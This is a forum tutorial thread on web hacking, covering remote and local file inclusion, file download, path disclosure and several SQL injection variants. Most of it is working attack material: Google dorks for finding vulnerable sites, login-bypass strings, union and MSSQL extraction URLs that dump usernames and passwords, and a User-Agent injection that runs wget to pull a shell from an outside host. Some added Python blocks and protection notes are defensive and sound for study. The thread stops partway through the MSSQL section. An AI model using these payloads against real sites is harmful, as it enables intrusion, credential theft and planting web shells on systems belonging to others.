Thread subject: Security Override :: HQ Guide - Web-Hacking Methods Tutorial

Posted by hax366 on 02/12/2014 07:58:18
#1

Hello Hackers!

This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from this here.

Guide content:

[I] - Remote file inclusion
[1] RFI?
[2] Vulnerable script
[3] Exploiting vulnerability
[4] Null byte bypass
[5] Protection script

[II] Local file inclusion
[1] LFI?
[2] Finding vulnerable sites
[3] Checking site vulnerability
[4] /proc/self/environ
[5] Shell uploading

[III] Local file download
[1] LFD?
[2] Vulnerable script
[3] Vulnerability check
[4] Exploiting vulnerability
[5] Protection script

[IV] Full path disclosure

[V] MYSQL Injection
[1] Dorks
[2] Logging in

[VI] SQL Injection - with load file
[1] SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns
[10] Filter bypassing
[11] Site protection from SQL Injection

[VII] MSSQL Injection
[1] Finding number of columns
[2] Finding database version
[3] Finding table name
[4] Finding column name
[5] Taking data from columns

[VIII] Blind SQL Injection
[1] Blind SQL Injection?
[2] Site vulnerability check
[3] Finding database version
[4] MYSQL user
[5] Finding table name
[6] Finding column name
[7] Taking data from columns
[8] Taking data from columns using sqlmap

[IX] Postgre SQL Injection
[1] Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns

[X] Error based Postgre SQL Injection
[1] Error based Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding database version
[5] Finding table name
[6] Finding column name
[7] Taking data from columns

[XI] SQL Injection on ASPX
[1] Site vulnerability check
[2] Finding table name
[3] Finding column name
[4] Finding columns in admin table
[5] Finding username and password

[XII] Dot net nuke

[XIII] XSS
[1] XSS?
[2] Required stuff
[3] XSS types
[4] Testing XSS vulnerability
[5] Cookie stealing
[6] Filter bypassing

[XIV] CRLF
[1] CRLF?
[2] Vulnerable places
[3] Exploiting vulnerability and protection
[4] Vulnerable script

[XV] CSRF
[1] CSRF?
[2] Vulnerable places
[3] Exploiting vulnerability

[XVI] Server Side Includes | Server Side Inclusion
[1] Introduction Server Side Includes
[2] SSI creating
[3] Server Side Inclusion


END

So let's get started!

[I] Remote file inclusion

1) RFI?
RFI (Remote File Inclusion) is a type of web attack. It occurs when a PHP script uses include() to include a file whose name is taken from a GET parameter. The included file is usually a txt-format page whose content is printed.
Example:
Code
http://www.site.com/index.php?page=home

Nowadays RFI is rarely found, and all you need to use it on a vulnerable site is a shell in txt format.

2) Vulnerable script

Code
<?php
// The page name comes straight from the URL and is passed to include()
// without any check, so a remote URL or any local path can be included.
$page = $_GET['page'];
include($page);
?>
3) Exploiting vulnerability
We have the site:
Code
http://www.site.com/index.php?page=home

Instead of home we put the link to our shell, so we get:
Code
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?

If the site is vulnerable, the shell is displayed, showing the file list of the site being attacked.

4) Null byte bypass
Some scripts have a weak protection that appends an .html (or some other) extension to the included file:
Code
<?php
$page = $_GET['page'];
include($page.".html");
?>

In that case we use the null byte bypass (%00). Everything after %00 is ignored. We also use %00 for bypassing picture-upload checks to upload PHP, but I am not going to talk about that here. (Note that this only works on PHP older than 5.3.4; since that version PHP rejects file paths that contain a null byte.)

So the link should look like this:
Code
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00
5) Protection script
The vulnerable script looks like this:
Code
<?php
$page = $_GET['page'];
include($page);
?>

So we add a check before including:
Code
<?php
$page = $_GET['page'];
// Only include the file if it exists under the local pages/ directory.
// A remote URL is not a local file, so it fails this check.
if(file_exists("pages/".$page)) {
include("pages/".$page);
}
?>

Note that file_exists() still accepts ../ sequences, so a value such as ../../etc/passwd passes this check; comparing $page against a fixed list of allowed page names is the safer form of this protection.

[II] Local file inclusion

1) LFI?
LFI (Local File Inclusion) can be used on sites like:
Code
http://link.com/index.php?page=

by adding
Code
../../../../../../etc/passwd

(sometimes you have to add %00 after passwd).

2) Finding vulnerable sites:
Code
index.php?page=
index.php?option=
search.php?word=
3) Checking site vulnerability:
Find a site and use
Code
../../../../../../../../../../../etc/passwd

or
Code
../../../../../../../../../../../etc/passwd%00

When you put this in the link you get something like this:
Code
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
ntp:x:103:106::/home/ntp:/bin/false
snmp:x:104:65534::/var/lib/snmp:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

which means that the site is vulnerable.

4) /proc/self/environ

Now we want to see whether /proc/self/environ can be read through the site, because that is what lets us upload a shell.

Instead of etc/passwd%00 we put /proc/self/environ

If the page prints something like this:
Code
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv..........

then /proc/self/environ is readable, so we can upload the shell. Note that the output contains the headers of our own request (HTTP_USER_AGENT, HTTP_REFERER); that is what the next step relies on.

5) Shell uploading

To upload the shell we need Mozilla Firefox:
Code
http://www.mozilla.com/firefox/

and the add-on Tamper Data:
Code
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Open the site, e.g.:
Code
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ

Tools > Tamper Data
Click Start Tamper, then refresh the page and put the following code in the User-Agent header:
Code
<?system('wget www.link.com/shell.txt -O shell.php');?>

Click OK. Because the included /proc/self/environ now contains this header, PHP executes it. To access the shell use:
Code
www.link.com/shell.php
[III] Local file download

1) LFD?
LFD (Local File Download) is a vulnerability in a script that is used to download files using the GET method; it can also be used with the POST method using the Tamper Data add-on.
Code
http://site.com/download_file.php?file=notepad.exe

2) Vulnerable script
Code
<?php
if(isset($_POST['download'])) {
// The file name comes straight from the request and is passed to
// filesize()/readfile() unchecked, so any readable file can be downloaded.
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
3) Vulnerability check

To check whether the script is vulnerable we try to download etc/passwd.
So instead of:
Code
http://site.com/download_file.php?file=notepad.exe

we use:
Code
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd

If the download starts and the file, opened in a text editor, looks something like this:
Code
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin

the script is vulnerable!
NOTE: If it is a Windows server use boot.ini instead of etc/passwd.

4) Exploiting vulnerability

Now that we know the script is vulnerable, we want to see which files are on the host. You can do it this way:
Code
http://site.com/download_file.php?file=../

../ takes us one directory back and downloads the "file".

1.1 It is possible that the downloaded file, opened in a text editor, lists the files in the directory.
1.2 Or it is possible that the file downloads but is empty when opened in a text editor.

In case 1.1 we don't have to guess file names and directories and can download whatever we want.
In case 1.2 we must guess file names and directories and can download only the files whose names we guess. There are a few programs that can help find files (Acunetix and HTTrack Website Copier).

5) Protection script

We have the script mentioned at the start:
Code
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>

By adding if(file_exists("download/".$file)) we are going to secure the script.
So it should look like:
Code
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$path = "download/".$file;
$file_info = pathinfo($path);
// Only serve files that exist under the download/ directory.
if(file_exists($path)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($path));
readfile($path);
exit;
}
}
?>

As with the RFI protection script, file_exists() does not stop ../ inside the name, so a value like ../../etc/passwd still passes; restricting $file to a known list of downloadable names, or checking that realpath($path) stays inside the download/ directory, is the safer check.

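The following is an added example, not code from the original post: a Python version of the path check that both the RFI protection script in section [I] and the LFD protection script above need. It rejects remote locations, null bytes (the %00 trick), and anything that resolves outside the base directory, and optionally enforces an allowlist of names. The pages/ directory, its files and the request names are constructed here for the demonstration.

```python
"""Added example: safe resolution of a user-supplied page or file name.

The checks mirror what the PHP include()/readfile() protection scripts
should do instead of a bare file_exists("pages/".$page): refuse remote
URLs (RFI), refuse NUL bytes (%00), refuse names that escape the base
directory (../ traversal) and, best of all, only serve known names.
"""
import os
import tempfile
from urllib.parse import unquote


class UnsafePath(ValueError):
    """Raised when a requested name must not be served."""


def resolve_safe_path(base_dir: str, requested: str, allowlist=None) -> str:
    """Return the absolute path of `requested` inside `base_dir`, or raise."""
    # Decode once, the way the web server does before PHP sees $_GET.
    name = unquote(requested)
    # PHP < 5.3.4 truncated paths at a NUL byte; reject such names outright.
    if "\x00" in name:
        raise UnsafePath("NUL byte in name")
    # A URL or UNC/protocol-relative location is never a local page.
    if "://" in name or name.startswith(("//", "\\\\")):
        raise UnsafePath("remote location in name")
    # Strongest check: only names we know about are ever served.
    if allowlist is not None and name not in allowlist:
        raise UnsafePath("name not on allowlist")
    base = os.path.realpath(base_dir)
    # os.path.join discards base for an absolute name such as /etc/passwd,
    # which the containment check below then catches.
    target = os.path.realpath(os.path.join(base, name))
    # The os.sep suffix stops "/var/www/pages2" passing as inside "/var/www/pages".
    if target != base and not target.startswith(base + os.sep):
        raise UnsafePath("path escapes base directory")
    if not os.path.isfile(target):
        raise UnsafePath("no such file")
    return target


def classify(base_dir: str, requested: str, allowlist=None) -> str:
    """Return 'ok' or the reason a request was refused."""
    try:
        resolve_safe_path(base_dir, requested, allowlist)
        return "ok"
    except UnsafePath as exc:
        return str(exc)


def build_demo_site() -> str:
    """Construct a throwaway pages/ directory with two legitimate pages."""
    root = tempfile.mkdtemp(prefix="lfi_demo_")
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    for page in ("home.html", "about.html"):
        with open(os.path.join(pages, page), "w") as fh:
            fh.write("<h1>%s</h1>\n" % page)
    # A file one level above pages/ that must never be reachable.
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("constructed secret, not a real password file\n")
    return pages


if __name__ == "__main__":
    pages_dir = build_demo_site()
    for req in ("home.html", "../secret.txt", "home.html%00",
                "www.shell-link.com/shell.txt?", "http://evil.example/shell.txt"):
        print("%-35s -> %s" % (req, classify(pages_dir, req)))
    print("about.html with allowlist -> %s"
          % classify(pages_dir, "about.html", allowlist={"home.html"}))
```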
[IV] Full path disclosure

This method uses errors in files, or mistakes made by programmers, to reveal which files are in which directories. You can't directly hack a site with it; it just helps while hacking.

It is useful because it makes hacking faster and easier, and it helps with Local File Inclusion (LFI) when a folder or file name has been changed: you can find out the real name using FPD.

There are a lot of ways to use an FPD vulnerability on a site; I'll explain the 2 most important.

The 1st is through an array, by adding square brackets to a link like this one:
Code
index.php?page=home

To trigger the error, add [] in the right place:
Code
index.php?page[]=home

That will give you an error like this:
Code
Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory /home/insekure/public_html/index.php on line 211

From this you can see that the directory blah exists on the site.

The 2nd method is to set an empty session cookie (Null Session Cookie), which you can do through a JavaScript URL; the invalid session id makes the site throw an error.

This is the JavaScript code:
Code
javascript:void(document.cookie='PHPSESSID=');

Put that in your address bar and hit enter; when the page is refreshed you will get this error:
Code
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58

Then try to open the directory thems on the site; that should list the files in that directory.

Protection:
The simplest way to protect against these attacks is to turn off error reporting.
Edit or add:
Code
error_reporting(0);

A better setting keeps the errors but hides them from visitors: in php.ini set display_errors = Off and log_errors = On, so the warnings go to the server log instead of the page.
[V] MYSQL Injection

1) Dorks
Code
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp

I am going to use:
Code
http://site.com/Admin_Login.asp

2) Logging in

Now find a site using these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--

Instead of password' or 1=1 you can use one of these:
Code
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'

password' or 1=1-- closes the password string and adds a condition that is always true, so the server's login query matches and lets you in.
So if you are able to log in, the site is vulnerable and you can use the admin panel.

[VI] SQL Injection

1) SQL Injection?
SQL Injection is a type of web attack. The attacker uses a hole in the script to take data from the database. Vulnerable sites are in the format:
Code
http://www.link.com/index.php?id=

Anything else can stand in place of index.

2) Finding vulnerable sites:
The best way to find vulnerable sites is with Google. We use these dorks:
Code
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check:
There are 2 ways to check whether a site is vulnerable.

1st way: we have the link:
Code
http://site.com/book.php?id=141

We add only ' at the end of the link, so we get:
Code
http://site.com/book.php?id=141'

2nd way: we have the link:
Code
http://site.com/book.php?id=141

We add +and+1=2-- at the end of the link, so we get:
Code
http://site.com/book.php?id=141+and+1=2--

If some part of the page disappears (picture, text or something) or an error appears (like "You have an error in your SQL syntax"), the site is vulnerable.

4) Finding number of columns
We do it with order by. On the link:
Code
http://site.com/book.php?id=141

we add +order+by+5--
Code
http://site.com/book.php?id=141+order+by+5--

If the page opens normally there are more than 5 columns. Let's try 10.
Code
http://site.com/book.php?id=141+order+by+10--

Now some part of the site disappeared, which means there are more than 5 and fewer than 10 columns. Let's try 7.
Code
http://site.com/book.php?id=141+order+by+7--

The page opens normally, which means there are at least 7 and fewer than 10 columns. Let's try 8.
Code
http://site.com/book.php?id=141+order+by+8--

With 8 part of the site disappears, which means there are 7 columns.

5) Finding vulnerable columns

Vulnerable columns are found with union select all. To the link (in this case) we add +union+select+all+1,2,3,4,5,6,7--
Code
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--

The page will print numbers (in this case 1 2 3 4 5 6 7), which means that data can be taken from any of those columns. We are going to take it from the second column.

6) Finding database version

As I said, we take data from the second column. Instead of the number 2 we put version() or @@version
Code
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--

Where the number 2 was, the page shows the database version.
If the database version is 4 we have to guess the names of the table and columns, but if it is 5 we can read them from information_schema.

We have version 5.0.51a-24+lenny5, which means that we don't have to guess the table and column names.

7) Finding table names

If the database version is 4 you won't be able to list the table and column names; you have to guess them. If the version is 5, skip this step.
Names of some possible tables:
Code
admin
admins
user
users
member
members

Names of some possible columns:
Code
username
uname
un
user
name
nick
password
pw
pwd
passwd

If the database version is 5 we can get the table names in the next step: instead of the number 2 we put group_concat(table_name), and after the number of the last column +from+information_schema.tables+where+table_schema=database()--

So we get this link:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--

Instead of the number 2 it shows the table names, in this case date, book, users. We are going to take the columns from the users table.

8) Finding column name

We found the table we want and now we want its columns. Instead of group_concat(table_name) we put group_concat(column_name), and instead of +from+information_schema.tables+where+table_schema=database()-- we put +from+information_schema.columns+where+table_name=hex--, where hex is the table name encoded in hex.

Go to:
Code
http://www.string-functions.com/string-hex.aspx

Write the name of the table (in this case users) and we get the hex value 7573657273; with the 0x prefix it can be used in the query, so now we can see the columns:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--
9) Taking data from columns

We got: id, name, surname, username, password, level.
We need only username and password.

Instead of group_concat(column_name) we put group_concat(username,0x3a,password); 0x3a is the hex code of ':', which separates the username from the password. Instead of +from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--

And we have the link:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users--

and a result like:
Code
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga

which is the users and passwords from this site.

10) Filter bypassing

If writing union+select+all gives "not accessible", change it to UnIoN+sElEcT+aLl
On some sites the space is restricted, so you can put + or /**/ instead (/* starts a comment in SQL, just as in PHP, and */ ends it).
On some sites the database version is also restricted, so you can use unhex(hex(version()))

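As an added example (not part of the original post), here is how a defender would recognise the probes from the LFI, /proc/self/environ and SQL injection sections in web server access logs, including the UnIoN+sElEcT and /**/ variants from the filter-bypassing step. Requests are normalised (URL-decoded, '+' to space, comments stripped, lower-cased) before matching, and a burst of ascii()/substring() probes from one address is reported as the footprint of letter-by-letter blind extraction. The log lines, IP addresses and thresholds are constructed for this example.

```python
"""Added example: flagging LFI/RFI and SQL injection probes in access logs."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [time] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (tag, pattern over the normalised request); one tag per technique in the guide
RULES = [
    ("traversal",      re.compile(r"(?:\.\./){2,}|/etc/passwd|boot\.ini")),
    ("proc_environ",   re.compile(r"/proc/self/environ")),
    ("null_byte",      re.compile(r"\x00")),
    ("remote_include", re.compile(r"=(?:https?:)?//|=www\.[a-z0-9.-]+/")),
    ("union_select",   re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("schema_enum",    re.compile(r"information_schema\.|\bmysql\.user\b")),
    ("file_read",      re.compile(r"\bload_file\s*\(")),
    ("version_probe",  re.compile(r"@@version|\bversion\s*\(")),
    ("blind_probe",    re.compile(r"\b(?:ascii|substring)\s*\(")),
    ("auth_bypass",    re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+'?")),
]
# The /proc/self/environ technique places PHP code in a request header.
PHP_TAG = re.compile(r"<\?")


def normalise(text: str) -> str:
    """Decode (twice, for double encoding), drop /**/ comments, lower-case."""
    decoded = unquote_plus(unquote_plus(text))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return decoded.lower()


def inspect_request(path: str, user_agent: str = "", referer: str = "") -> list:
    """Return the rule tags that fire for one request."""
    text = normalise(path)
    tags = [tag for tag, rx in RULES if rx.search(text)]
    if PHP_TAG.search(user_agent) or PHP_TAG.search(referer):
        tags.append("php_in_header")
    return tags


def scan_log(lines, blind_threshold: int = 5):
    """Return (alerts, noisy_ips).

    alerts: (ip, path, tags) for every request that hit at least one rule.
    noisy_ips: addresses with >= blind_threshold blind_probe hits, the shape
    of the letter-by-letter extraction in the Blind SQL Injection section.
    """
    alerts, blind_hits = [], Counter()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        tags = inspect_request(m["path"], m["ua"], m["referer"])
        if tags:
            alerts.append((m["ip"], m["path"], tags))
            if "blind_probe" in tags:
                blind_hits[m["ip"]] += 1
    noisy = sorted(ip for ip, n in blind_hits.items() if n >= blind_threshold)
    return alerts, noisy


# Constructed sample log: one benign request, then probes from the guide.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Dec/2014:07:58:18 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Dec/2014:07:58:20 +0000] "GET /index.php?page=../../../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Dec/2014:07:58:25 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 3000 "-" "<?php echo 1; ?>"',
    '203.0.113.5 - - [02/Dec/2014:07:59:01 +0000] "GET /book.php?id=-141+UnIoN+sElEcT+aLl+1,@@version,3,4,5,6,7-- HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Dec/2014:07:59:05 +0000] "GET /book.php?id=141/**/order/**/by/**/8-- HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
] + [
    '198.51.100.9 - - [02/Dec/2014:08:0%d:00 +0000] "GET /index.php?id=1+and+ascii(substring((select+username+from+users+limit+0,1),1,1))>%d HTTP/1.1" 200 800 "-" "Mozilla/5.0"'
    % (i, 64 + i) for i in range(5)
]

if __name__ == "__main__":
    found, noisy_ips = scan_log(SAMPLE_LOG)
    for ip, path, tags in found:
        print(ip, ",".join(tags), path)
    print("blind-injection sources:", noisy_ips)
```
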
11) Site protection from SQL Injection

Just put this code in your script:
Code
// Refuse any id that is not a number, so ' or and+1=2 never reach the query.
if(!is_numeric($_GET['id']))
{
echo 'This text is shown when someone tries to add \' or and+1=2';
exit;
}

is_numeric() only protects numeric parameters; the complete fix is to pass $_GET['id'] to the database as a bound parameter of a prepared statement instead of concatenating it into the query text.

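The following is an added example, not code from the original post: it reproduces, against an in-memory SQLite database constructed here, why the login bypass from section [V] and the id injection from this section work, and shows the protection step finished with a type check plus bound parameters. The user names and passwords are invented; passwords are stored in plain text only to mirror the guide's example (real systems store hashes).

```python
"""Added example: concatenated vs parameterised queries for the guide's payloads."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create the demo users table the queries below run against."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                "password TEXT, level INTEGER)")
    con.executemany("INSERT INTO users (username, password, level) VALUES (?, ?, ?)",
                    [("admin", "demo-admin-pw", 9), ("seratum", "seratum", 1)])
    return con


def login_vulnerable(con, username: str, password: str):
    """Login the way the vulnerable admin panel does: values pasted into the SQL.

    With password = "password' or 1=1--" the query becomes
      ... WHERE username='Admin' AND password='password' or 1=1--'
    AND binds tighter than OR, so every row matches and the first is returned.
    """
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username: str, password: str):
    """Same query with bound parameters: the quote and the -- stay inside the value."""
    row = con.execute("SELECT username FROM users WHERE username=? AND password=?",
                      (username, password)).fetchone()
    return row[0] if row else None


def record_by_id_vulnerable(con, id_param: str) -> list:
    """book.php?id=... style lookup with the id concatenated into the SQL."""
    return [r[0] for r in con.execute("SELECT username FROM users WHERE id=%s" % id_param)]


def record_by_id_safe(con, id_param: str) -> list:
    """The is_numeric() check from the protection step, plus a bound parameter.

    Rejecting the request (not only printing a message) is what keeps the
    query from running, and the binding covers anything the type check misses.
    """
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return [r[0] for r in con.execute("SELECT username FROM users WHERE id=?",
                                      (int(id_param),))]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "Admin", "password' or 1=1--"))   # admin (bypassed)
    print(login_safe(db, "Admin", "password' or 1=1--"))         # None
    print(record_by_id_vulnerable(db, "-1 union select all username from users"))
    print(record_by_id_safe(db, "2"))                             # ['seratum']
```
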
SQL Injection - Load File

You found a site with an SQL vulnerability; now you can try to access the mysql.user table and check for file privileges.

To see which user we are and whether we have access to the user table, we put user in place of a vulnerable column and add +from+mysql.user-- at the end of the URL.

It should look like this:
Code
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--

If you get a username, it means that you have access to the mysql.user table and you can continue with this tutorial.

Now to see whether we have file privileges, instead of user we put concat(user,0x3a,file_priv), again with +from+mysql.user--

The page now lists usernames and file privileges. Find the username that was shown at the start, when you put user in the column; if there is a 'Y' (Yes) next to it, you have file privileges.

Load File:

All we have to do is write load_file('FILE NAME') in the vulnerable column.
We try with /etc/passwd, so we type load_file('/etc/passwd') in the vulnerable column.

Which looks like this:
Code
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--

If it gives us an error we can convert the file name to Char or Hex, but then we must remove the quotes around the file name.

Hex e.g.
If we convert the file name to Hex, we put 0x before it:
Code
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4+from+mysql.user--

The hex code 2f6574632f706173737764 stands for /etc/passwd.

Recommended hex converter:
Code
www.string-functions.com/string-hex.aspx

If you decide to convert the file name to Char, use load_file(char(file name converted to char))

Which looks like:
Code
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100),4--

Where 47,101,116,99,47,112,97,115,115,119,100 stands for /etc/passwd

Char converter:
Code
http://pookey.co.uk/binary.php
[VII] MSSQL Injection

1) Finding number of columns

I will use:
Code
http://www.site.com/sr/page/member.asp?id=234

To find the number of columns we use order by. We add +order+by+5-- at the end of the link.
Code
http://www.site.com/sr/page/member.asp?id=234+order+by+5--

We get this error:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list.

/sr/page/member.asp, line 38

which means that there are fewer than 5 columns. Let's try 4: we get the same error, so we try 3 and get this error:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.

/sr/page/member.asp, line 44

which means that there are 3 columns.

2) Finding database version

To find the database version we use @@version.
Code
http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--

and we get:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/sr/page/member.asp, line 38

and from here we can see the database version: the server tries to convert the string into an int column and echoes it in the error message.

3) Finding table name

With MSSQL Injection it is not possible to get all tables at once; we must go 1 by 1.
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables--

and we get:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int.

/sr/page/member.asp, line 38

and we can see that we have a table called 'Country'.

Now we have to find the other tables. We use not in. So we have the link:
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables+where+table_name+not+in('Country')--

and we get:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int.

/sr/page/member.asp, line 38

and from here we can see that we have an Admin table.

4) Finding column name

It is the same for columns. We cannot get all columns at once, so we do it 1 by 1. In this case we use where+table_name='Admin'--. So we have the link:
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'--

and we get the error:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int.

/sr/page/member.asp, line 38

From here we can see that we have the column USERNAME. Now we need the rest of the columns, so we use not in again.
Code
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--

and we get:
Code
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

